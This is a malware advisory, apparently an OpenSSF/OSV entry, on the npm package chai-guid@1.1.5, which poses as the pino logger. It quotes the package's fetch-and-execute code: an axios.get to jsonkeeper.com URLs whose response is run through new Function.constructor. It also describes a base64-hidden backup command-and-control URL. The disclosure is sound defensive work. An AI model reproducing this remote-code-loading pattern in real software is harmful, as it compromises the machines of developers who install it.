OpenSSF/OSV advisory MAL-2026-5903 confirms this npm version as malicious. chai-guid impersonates the pino logger and the chai-guid chai plugin (README copies pino badges and pinojs CI links; index.js exports middleware as `module.exports.pino`). When a consumer calls the exported middleware, index.js spawns lib/caller.js as a detached Node process with stdio ignored. lib/caller.js performs `axios.get('https://jsonkeeper.com/b/U2BTS')`, reads the `.cookie` field of the response, and...
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in chai-guid (npm)
Details
chai-guid impersonates the pino logger and the chai-guid chai plugin (README copies pino badges and pinojs CI links; index.js exports middleware as `module.exports.pino`). When a consumer calls the exported middleware, index.js spawns lib/caller.js as a detached Node process with stdio ignored. lib/caller.js performs `axios.get('https://jsonkeeper.com/b/U2BTS')`, reads the `.cookie` field of the response, and executes it via `new Function.constructor('require', s)(require)` — running attacker-controlled JavaScript with full Node privileges and `require` injected. A second base64-encoded URL (`https://jsonkeeper.com/b/XRGF3`) is hidden in a fake `process.env.DEV_API_KEY` shim in lib/caller.js and lib/const.js as a secondary C2 endpoint. jsonkeeper.com is an anonymous, mutable JSON-paste host; whatever bytes the attacker pastes there will be executed on the installer's machine the moment any consumer invokes the package's middleware.
Decision reason
OSV/OpenSSF confirms chai-guid@1.1.5 as malicious package MAL-2026-5903. Malicious code in chai-guid (npm)